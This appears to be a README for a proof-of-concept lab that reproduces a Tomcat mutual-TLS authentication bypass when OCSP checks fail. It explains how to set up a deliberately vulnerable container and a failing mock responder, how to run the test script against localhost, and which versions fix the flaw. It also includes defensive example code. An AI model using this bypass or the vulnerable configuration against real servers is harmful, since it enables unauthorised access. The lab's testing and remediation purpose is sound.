## https://sploitus.com/exploit?id=15A6CDF4-8DBB-5A3A-82E6-BBF6AC3C5629
# CVE-2026-29145 Testing Environment
## Overview
This repository contains a proof-of-concept (PoC) environment designed to test for **CVE-2026-29145**.
The vulnerability is an **authentication bypass in Apache Tomcat's Mutual TLS (CLIENT_CERT) implementation**. When OCSP (Online Certificate Status Protocol) is configured with soft-fail disabled, Tomcat may fail to treat an OCSP check failure as a hard denial. This allows a client with a potentially revoked or unverified certificate to bypass authentication if the OCSP responder is unreachable or returns an error.
## Vulnerability Details
| Property | Value |
|----------|-------|
| **CVE ID** | CVE-2026-29145 |
| **CVSS Score** | 9.1 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N |
| **Attack Vector** | Network |
| **Privileges Required** | None |
| **Impact** | Authentication Bypass |
### Prerequisites for Vulnerability
- CLIENT_CERT authentication enabled in Tomcat
- OCSP revocation checking enabled
- Soft-fail option disabled (hard-fail mode)
- Unreachable or failing OCSP responder
---
## Getting Started
### Prerequisites
- **Docker & Docker Compose**: To run the vulnerable Tomcat container
- **OpenSSL**: To generate the PKI (Public Key Infrastructure) - usually pre-installed on Linux/macOS
- **Python 3.7+**: To run the testing script and mock responder
- **curl** (optional): For manual testing
### Installation & Quick Start
#### 1. Clone and setup the environment
```bash
# Navigate to the project directory
cd CVE-2026-29145-Tester
# Make scripts executable
chmod +x setup_certs.sh cleanup.sh
# Install Python dependencies
pip install -r requirements.txt
```
#### 2. Generate certificates
```bash
./setup_certs.sh
```
**What this does:**
- Creates a Root CA (Certificate Authority)
- Generates server certificate for Tomcat
- Generates client certificate with OCSP extension pointing to `http://localhost:8888`
- Validates all certificates were created successfully
**Expected output:**
```
[INFO] Starting certificate generation for CVE-2026-29145 testing environment
[INFO] OpenSSL found: OpenSSL 3.0.x (...)
[INFO] Created certs directory
[INFO] Generating Root CA...
[INFO] Generating Server Certificate...
[INFO] Generating Client Certificate with OCSP Extension...
[INFO] Certificate setup completed successfully!
```
#### 3. Start the vulnerable environment
```bash
docker-compose up -d
```
**What this does:**
- Starts the OCSP Mock Responder on port 8888 (simulates failure with HTTP 500)
- Starts vulnerable Tomcat 10.1.52 on port 8443 with CLIENT_CERT authentication
- Creates internal Docker network for service communication
- Sets up health checks for both services
**Verify containers are running:**
```bash
docker-compose ps
```
#### 4. Run the exploitation test
```bash
python poc_exploit.py
```
**Expected outputs:**
**Vulnerable System:**
```
[INFO] Attempting connection to https://localhost:8443/protected-resource...
[WARNING] VULNERABLE: Access granted despite OCSP check failure.
[WARNING] Response preview: ...
```
**Patched System:**
```
[INFO] Attempting connection to https://localhost:8443/protected-resource...
[INFO] NOT VULNERABLE: Access denied (Authentication working).
```
---
## Testing Scenarios
| Scenario | OCSP Status | Expected (Patched) | Result (Vulnerable) | Notes |
|----------|-------------|-------------------|---------------------|-------|
| Normal Operation | Online & Valid | 200 OK | 200 OK | OCSP check succeeds, access granted |
| Soft Failure | Offline/Timeout | 403 Forbidden | 200 OK | **BYPASS** - OCSP responder unreachable |
| Hard Revocation | Online & Revoked | 403 Forbidden | 403 Forbidden | Certificate explicitly revoked |
| Invalid Certificate | Invalid Chain | 403 Forbidden | 403 Forbidden | Chain validation fails |
### Running Different Test Scenarios
**Test 1: Default (OCSP Responder Failing)**
```bash
# Keep containers running
python poc_exploit.py
```
**Test 2: Stop OCSP Responder (Simulate Timeout)**
```bash
docker-compose pause ocsp-responder
python poc_exploit.py
docker-compose unpause ocsp-responder
```
**Test 3: Manual Testing with curl**
```bash
curl -v \
--cert certs/client-cert.pem \
--key certs/client-key.pem \
--cacert certs/ca-chain.pem \
https://localhost:8443/protected-resource
```
---
## Project Structure
```
CVE-2026-29145-Tester/
├── README.md               # This file
├── setup_certs.sh          # Certificate generation script (with validation)
├── cleanup.sh              # Cleanup and reset script
├── docker-compose.yml      # Docker service orchestration
├── requirements.txt        # Python dependencies
├── poc_exploit.py          # Main testing script (with logging and error handling)
├── simple_proxy_fail.py    # Mock OCSP responder (with detailed logging)
├── .gitignore              # Git ignore rules for certificates and logs
├── certs/                  # Generated certificates (created by setup_certs.sh)
│   ├── ca-chain.pem        # Root CA certificate
│   ├── ca-key.pem          # Root CA private key
│   ├── server-cert.pem     # Tomcat server certificate
│   ├── server-key.pem      # Tomcat server private key
│   ├── client-cert.pem     # Test client certificate
│   └── client-key.pem      # Test client private key
├── tomcat/
│   └── server.xml          # Vulnerable Tomcat configuration
└── logs/                   # Tomcat logs (created at runtime)
```
---
## Configuration Details
### Server.xml Configuration (Vulnerable)
The `tomcat/server.xml` file configures the TLS connector used for CLIENT_CERT authentication.
**Key Settings:**
- `certificateVerification="required"` - Enforces CLIENT_CERT authentication
- `OCSP on` - Enables OCSP revocation checking
- No soft-fail override - Uses hard-fail mode (vulnerable)
### OCSP Responder Configuration
The mock OCSP responder (`simple_proxy_fail.py`):
- Listens on `localhost:8888`
- Always returns HTTP 500 (Server Error)
- Logs all incoming OCSP requests
- Simulates an unreachable/failing OCSP service
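The scenario table above and the mock responder description boil down to one policy question: what does the server do when the OCSP answer is not an affirmative "good"? The following is an added example, not code from the CVE-2026-29145-Tester project, that models both halves in one runnable script: a constructed mock responder in the style described for `simple_proxy_fail.py` (always HTTP 500, logging every request, here on an ephemeral loopback port instead of 8888) and a fail-closed `authorize()` decision that shows the difference between hard-fail and soft-fail for the "Soft Failure" row. The wire format is a constructed plain-text stand-in, not DER-encoded OCSP; the mode names, `OcspStatus` values and function names are this example's own.

```python
"""Added example (not part of the CVE-2026-29145-Tester project): a mock OCSP
responder like the one the README describes, plus a fail-closed revocation
decision. The request/response bodies are constructed plain text, not RFC 6960 DER."""
import http.server
import socket
import socketserver
import threading
import urllib.error
import urllib.request
from enum import Enum


class OcspStatus(Enum):
    GOOD = "good"
    REVOKED = "revoked"
    UNKNOWN = "unknown"          # responder answered, but not with a usable status
    UNAVAILABLE = "unavailable"  # unreachable, timed out, or HTTP error (e.g. 500)


class MockOcspHandler(http.server.BaseHTTPRequestHandler):
    """Constructed responder. mode 'error' mirrors the README's failing responder
    (always HTTP 500); 'good' and 'revoked' model a healthy responder."""
    mode = "error"
    seen = []  # (method, path, body length) of every request, like the responder's logging

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        body = self.rfile.read(length)
        MockOcspHandler.seen.append((self.command, self.path, len(body)))
        if MockOcspHandler.mode == "error":
            self.send_response(500)
            self.send_header("Content-Type", "text/plain")
            self.end_headers()
            self.wfile.write(b"simulated OCSP responder failure\n")
            return
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(MockOcspHandler.mode.encode())

    def log_message(self, fmt, *args):  # keep the example quiet
        pass


def start_responder():
    """Bind the mock on an ephemeral loopback port; returns (server, url)."""
    srv = socketserver.TCPServer(("127.0.0.1", 0), MockOcspHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d/" % srv.server_address[1]


def query_responder(url, timeout=2.0):
    """POST a constructed request; any transport or HTTP failure collapses to UNAVAILABLE."""
    req = urllib.request.Request(url, data=b"constructed-ocsp-request",
                                 headers={"Content-Type": "application/ocsp-request"},
                                 method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().strip()
    except (urllib.error.URLError, OSError):  # HTTPError (500) is a URLError subclass
        return OcspStatus.UNAVAILABLE
    try:
        return OcspStatus(body.decode())
    except ValueError:
        return OcspStatus.UNKNOWN


def authorize(status, soft_fail):
    """Fail-closed policy: only an affirmative GOOD grants access. With soft_fail=False
    (hard-fail, which a patched server in the README's lab must honour) UNKNOWN and
    UNAVAILABLE are denials; soft_fail=True reproduces the weak 'Soft Failure' outcome."""
    if status is OcspStatus.GOOD:
        return True
    if status is OcspStatus.REVOKED:
        return False
    return soft_fail


def run_scenario(mode, soft_fail):
    """Run one row of the scenario table; returns (ocsp_status, access_granted)."""
    MockOcspHandler.seen.clear()
    if mode == "unreachable":
        # A loopback port that was bound and released, so the connection is refused.
        probe = socket.socket()
        probe.bind(("127.0.0.1", 0))
        url = "http://127.0.0.1:%d/" % probe.getsockname()[1]
        probe.close()
        return_status = query_responder(url)
    else:
        MockOcspHandler.mode = mode
        srv, url = start_responder()
        try:
            return_status = query_responder(url)
        finally:
            srv.shutdown()
            srv.server_close()
    return return_status, authorize(return_status, soft_fail)


if __name__ == "__main__":
    for mode, soft in (("good", False), ("error", False), ("error", True),
                       ("revoked", False), ("unreachable", False)):
        print(mode, "soft_fail=%s" % soft, run_scenario(mode, soft))
```

The `error` and `unreachable` modes both end in `UNAVAILABLE`, and under hard-fail that is a denial regardless of why the responder did not answer; that is the property the "Soft Failure" row expects a patched server to have, and the property the vulnerable configuration loses.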
---
## Troubleshooting
### Common Issues & Solutions
#### Error: "OpenSSL is not installed"
```bash
# macOS
brew install openssl
# Ubuntu/Debian
sudo apt-get install openssl
# CentOS/RHEL
sudo yum install openssl
```
#### Error: "Missing certificate files"
**Cause:** Certificate generation failed or was not run.
```bash
# Clean up and regenerate
rm -rf certs
./setup_certs.sh
```
#### Error: "Connection refused" on port 8443
**Cause:** Tomcat container is not running or not ready.
```bash
# Check container status
docker-compose ps
# Check logs
docker-compose logs vulnerable-tomcat
# Ensure both services are running and healthy
docker-compose up -d
sleep 10 # Wait for services to start
```
#### Error: "Connection timeout"
**Cause:** Tomcat taking too long to start or network issues.
```bash
# Check Tomcat startup logs
docker-compose logs vulnerable-tomcat
# Increase timeout and retry
timeout 30 docker-compose logs -f vulnerable-tomcat # Monitor startup
```
#### Error: "docker-compose: command not found"
**Cause:** Docker Compose not installed or not in PATH.
```bash
# Install Docker Compose (if using standalone)
sudo curl -L "https://github.com/docker/compose/releases/download/v2.x.x/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose
# Or use docker compose (V2 integrated with Docker Desktop)
docker compose up -d
```
#### Error: "SSL: CERTIFICATE_VERIFY_FAILED"
**Cause:** Certificate validation failing.
```bash
# Verify certificate files exist
ls -la certs/
# Check certificate validity
openssl x509 -in certs/client-cert.pem -noout -text
```
#### Error: "requests.exceptions.SSLError"
**Cause:** SSL handshake failure - may indicate hard-fail is working correctly.
**Solution:** This is actually a positive sign! The hard-fail is preventing access when OCSP fails.
```bash
# Check if OCSP responder is running
docker-compose ps ocsp-responder
# View detailed error
python poc_exploit.py # Already provides detailed logging
```
#### Error: "Address already in use"
**Cause:** Port 8443 or 8888 is already in use.
```bash
# Find process using the port
lsof -i :8443
lsof -i :8888
# Kill the process or use different ports in docker-compose.yml
```
### Debugging & Logs
#### View detailed logs
```bash
# Tomcat logs
docker-compose logs -f vulnerable-tomcat
# OCSP responder logs
docker-compose logs -f ocsp-responder
# Python script debugging
python poc_exploit.py # Already includes detailed logging
```
#### Monitor real-time events
```bash
# Open terminal and run
docker-compose logs -f
# In another terminal, run test
python poc_exploit.py
```
#### Network debugging
```bash
# Test connectivity to OCSP responder
curl http://localhost:8888/
# Test OCSP responder from inside Tomcat container
docker exec vulnerable-tomcat curl http://ocsp-responder:8888/
# Test SSL handshake
openssl s_client -connect localhost:8443 \
-cert certs/client-cert.pem \
-key certs/client-key.pem \
-CAfile certs/ca-chain.pem
```
---
## Cleanup
To remove all containers, volumes, certificates, and logs:
```bash
./cleanup.sh
```
**What this does:**
- Stops and removes all Docker containers
- Removes the generated `certs/` directory
- Removes the `logs/` directory
- Cleans up Python cache files
**Verify cleanup:**
```bash
docker-compose ps # Should show nothing
ls -la certs/ # Should not exist
```
---
## Disclaimer
This project is for **educational and authorized security testing purposes only**.
- Only use against systems you own or have explicit written permission to test
- Using these tools against systems without authorization is **illegal** and unethical
- The authors are not responsible for any misuse of this software
- Always ensure you have proper backups before testing on production systems
---
## Remediation
To mitigate this vulnerability, upgrade Apache Tomcat to the following versions:
| Version Series | Minimum Fixed Version |
|----------------|----------------------|
| 11.0.x | 11.0.20 or later |
| 10.1.x | 10.1.53 or later |
| 9.0.x | 9.0.116 or later |
**Upgrade steps:**
```bash
# Example: Update docker-compose.yml to use patched version
# Change: image: tomcat:10.1.52-jdk17
# To: image: tomcat:10.1.53-jdk17
docker-compose down
docker-compose up -d
```
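When checking a fleet against the fixed-version table above, the comparison has to be done per series (a 9.0.116 is fixed while a 10.1.52 is not, even though 10 > 9). The following added example, which is not the project's own code, parses version strings such as a `Server` header value or an image tag, compares each against the table's minimum fixed release for its series, and sorts hosts into upgrade / current / unknown buckets. The inventory is constructed, and a version below the fixed release only means the host needs the upgrade: actual exposure still requires the prerequisites listed under "Prerequisites for Vulnerability".

```python
"""Added example (not part of the CVE-2026-29145-Tester project): version triage
against the README's remediation table."""
import re
from typing import Optional, Tuple

# Minimum fixed versions per series, taken from the README's remediation table.
FIXED_VERSIONS = {
    (11, 0): (11, 0, 20),
    (10, 1): (10, 1, 53),
    (9, 0): (9, 0, 116),
}

_VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)\b")


def parse_tomcat_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Pull x.y.z out of strings such as 'Apache Tomcat/10.1.52' or an image
    tag like 'tomcat:10.1.52-jdk17'; None when no three-part version is present."""
    m = _VERSION_RE.search(text)
    if m is None:
        return None
    major, minor, patch = (int(g) for g in m.groups())
    return (major, minor, patch)


def needs_upgrade(text: str) -> Optional[bool]:
    """True if the version is below the fixed release for its series, False if at or
    above it, None if the string has no version or its series is not in the table."""
    version = parse_tomcat_version(text)
    if version is None:
        return None
    fixed = FIXED_VERSIONS.get(version[:2])
    if fixed is None:
        return None  # series not covered by the table: decide manually
    return version < fixed


def triage(inventory):
    """Sort (host, version_string) pairs into upgrade / current / unknown buckets."""
    report = {"upgrade": [], "current": [], "unknown": []}
    for host, text in inventory:
        verdict = needs_upgrade(text)
        bucket = "unknown" if verdict is None else ("upgrade" if verdict else "current")
        report[bucket].append(host)
    return report


# Constructed sample inventory; hostnames and versions are made up for the example.
SAMPLE_INVENTORY = [
    ("app-01.example.test", "Apache Tomcat/10.1.52"),
    ("app-02.example.test", "tomcat:10.1.53-jdk17"),
    ("legacy.example.test", "Apache Tomcat/9.0.115"),
    ("edge.example.test", "Apache Tomcat/11.0.20"),
    ("old.example.test", "Apache Tomcat/8.5.100"),
    ("other.example.test", "nginx/1.25"),
]

if __name__ == "__main__":
    for bucket, hosts in triage(SAMPLE_INVENTORY).items():
        print(bucket, hosts)
```

Hosts whose series is not in the table (such as the 8.5.x entry) land in `unknown` rather than being silently treated as safe; that bucket is the one to review by hand against the vendor's advisory.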
---
## References
- [CVE-2026-29145 Details](https://nvd.nist.gov/)
- [Apache Tomcat Documentation](https://tomcat.apache.org/)
- [OCSP (RFC 6960)](https://tools.ietf.org/html/rfc6960)
- [Mutual TLS (mTLS) Overview](https://en.wikipedia.org/wiki/Mutual_TLS)
---
## Support
For issues, questions, or contributions, please open an issue or submit a pull request.
---
**Last Updated:** April 2026
**Status:** Testing & Documentation Complete